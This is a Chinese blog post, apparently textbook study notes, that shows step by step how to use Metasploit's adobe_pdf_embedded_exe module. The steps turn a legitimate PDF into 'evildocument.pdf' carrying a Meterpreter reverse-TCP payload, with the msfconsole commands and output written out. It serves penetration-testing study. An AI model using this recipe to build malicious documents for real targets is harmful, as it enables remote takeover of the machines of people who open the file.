Kali学习 | 漏洞利用:4.10 PDF文件攻击

Kali学习 | 漏洞利用:4.10 PDF文件攻击

PDF介绍

PDF是一种文件格式,该文件的使用比较广泛,并且容易传输。
通常在工作中,用户都是从工作程序中打开了一个合法的PDF文档。
当打开该文档时,该用户的主机就有可能被攻击
Metasploit提供了一个渗透攻击模块,可以来创建一个攻击载荷,通过传递该攻击载荷对目标系统进行渗透攻击。

操作步骤

(1)启动MSFCONSOLE。执行命令如下所示:

msfconsole

(2)搜索所有有效的PDF模块。执行命令如下所示:
在这里插入图片描述
以上输出信息显示了PDF所有可用的模块。此时可以选择相应模块进行配置,配置后方便进行攻击。
(3)使用Adobe PDF EmbeddedEXE模块。执行命令如下所示:

msf>use exploit/windows/fileformat/adobe_pdf_embedded_exe

(4)查看adobepdf embedded_exe模块有效的选项。执行命令如下所示:
在这里插入图片描述
以上信息显示了adobe_pdf_embedded_exe模块所有可用的选项。此时配置必须的选项,然后进行渗透攻击。
(5)设置用户想要生成的PDF文件名。执行命令如下所示:

msf exploit(adobe_pdf_embedded_exe)>set FILENAME evildocument.pdf 
FILENAME =>evildocument.pdf

(6)设置INFILENAME选项。为了利用,使用该选项指定用户访问的PDF文件位置。
执行命令如下所示:

msf exploit(adobe_pdf_embedded_exe)>set INFILENAME/root/Desktop/wille.pdf INFILENAME =>/root/Desktop/willie.pdf

(7)运行exploit。执行命令如下所示:

msf exploit(adobe_pdf_embedded_exe)>exploit
[*]Reading in/root/Desktop/willie.pdf...
[*]Parsing/root/Desktop/willie.pdf...
[*]Using'windows/meterpreter/reverse_tcp'as payload..
[*]Parsing Successful.Creating'evildocument.pdf file..[t]evildocument.pdf stored at/root/.msf4/local/levildocument.pdf

输出的信息显示了evildocumentpdf文件已经生成,而且被保存到/root.msf4/local目录中。

参考书籍:《Kali Linux渗透测试技术详解》

发布了90 篇原创文章 · 获赞 16 · 访问量 1683

猜你喜欢

转载自blog.csdn.net/qq_43233085/article/details/103944551